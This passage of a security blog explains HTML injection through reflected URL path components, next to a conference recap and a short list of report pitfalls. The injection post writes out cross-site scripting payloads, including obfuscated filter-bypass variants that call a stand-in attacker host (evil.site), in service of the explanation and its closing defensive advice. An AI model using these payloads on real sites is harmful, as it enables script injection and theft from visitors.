  • fail to clearly articulate a problem with regard to a security or privacy control (e.g. ambiguity in what the weakness is or what an attack would look like)
  • fail to consider the capabilities of an attack (e.g. filtering script and alert to prevent HTML injection)
  • do not provide clear resolutions or do not provide enough details to make an informed decision (e.g. can’t be implemented)
  • provide contradictory choices of resolution (e.g. counter a sniffing attack by applying input validation)

Oh well, we couldn’t avoid a list forever.

Never mind that. I’ll be back with more examples of good and bad. I can’t wait for this month to end, but that’s because Halloween is my favorite holiday. We should be thinking about security every month, every day. Just like the song says, Everyday is Halloween.

On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.Trail Ends

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:

https://web.site/en/dir/o/80/loch”onmouseover=$.get(“//evil.site/”);”

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

We could further obfuscate the payload in case some other kind of filter is present:

https://web.site/en/dir/o/80/loch”onmouseover=$["get"](“//evil.site/”);”
https://web.site/en/dir/o/80/loch”onmouseover=$["g"%2b"et"](“htt”%2b”p://”%2b”evil.site/”);”

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding for or a limited imagination of crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.

Hacker Halted US 2013 Presentation

Hacker Halted 2013 BadgeWhat a joy to visit Atlanta twice in one month! First DragonCon, now Hacker Halted. I operated on about the same amount of sleep for both events, but at least at HH I only waited once for an elevator at the Hilton.

And once again I’ll be leaving this great city with sci-fi goodies. This time around it’s a Star Trek USB drive that Hacker Halted kindly handed out to their speakers.

This is likely the final time I’ll present the JavaScript & HTML5 Security slide deck that I’ve been tweaking over the past year. (Although there’s plenty of material to translate into posts and interactive examples once some elusive free time appears.) It’s time to focus on different aspects of those technologies and different topics altogether. For example, I’ve recently been revisiting CSRF with an eye towards proposing new mechanisms to defeat it.

Next up is putting together CSRF lab content for HITB Malaysia this October. And, of course, making hotel reservations for a return to Atlanta — DragonCon 2014 awaits!